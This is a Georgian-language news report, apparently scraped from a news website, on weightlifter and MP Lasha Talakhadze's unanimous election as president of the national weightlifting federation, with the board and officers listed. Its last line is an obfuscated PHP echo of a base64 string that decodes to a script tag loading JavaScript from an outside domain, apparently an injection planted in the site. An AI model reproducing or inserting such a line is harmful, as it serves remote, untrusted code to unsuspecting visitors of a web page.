gorgia
ავერსი jaluzi

„ქართული ოცნების“ დეპუტატი, სამგზის ოლიმპიური ჩემპიონი ლაშა ტალახაძე ძალოსნობის ეროვნული ფედერაციის პრეზიდენტი გახდა. ინფორმაციას ძალოსნობის ეროვნული ფედერაცია ავრცელებს.

მათივე ცნობით, ტალახაძე ამ თანამდებობას 4 წლის ვადით დაიკავებს.

„ლაშა ტალახაძე ძალოსნობის ეროვნული ფედერაციის პრეზიდენტად აირჩიეს. სამგზის ოლიმპიური ჩემპიონი ეროვნულ ფედერაციას მომდევნო 4 წლის განმავლობაში უხელმძღვანელებს.

ლაშა ტალახაძე ფედერაციის ხელმძღვანელად ხმის უფლების მქონე დელეგატებმა ერთსულოვნად აირჩიეს.

ასევე დამტკიცდა გამგეობის წევრები: ტალახაძე ლაშა - თავმჯდომარე; კახიაშვილი აკაკიოს; ასანიძე გიორგი; თურმანიძე ირაკლი; გახოკიძე ავთანდილ; ტალახაძე კობა; თვალოძე ილია; ანთაური ზურაბ; ლომთაძე მალხაზ; ჩიქოვანი გოჩა; მიშველიძე შოთა; ცირეკიძე რაული; ხარატაშვილი დავით; ჭინჭარაული გიორგი; ხუზაურაშვილი ნუგზარ.

გენერალური მდივნის პოსტს კვლავ მურადაშვილი რუსუდანი დაიკავებს.

ახალმა პრეზიდენტმა დელეგატებს სამი ვიცე-პრეზიდენტი კახი კახიაშვილი, ირაკლი თურმანიძე და ნოდარ სირბილაშვილი წარუდგინა,“ - აღნიშნულია გავრცელებულ ინფორმაციაში.

ავტორი
სანდრო ჭითანავა
196
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");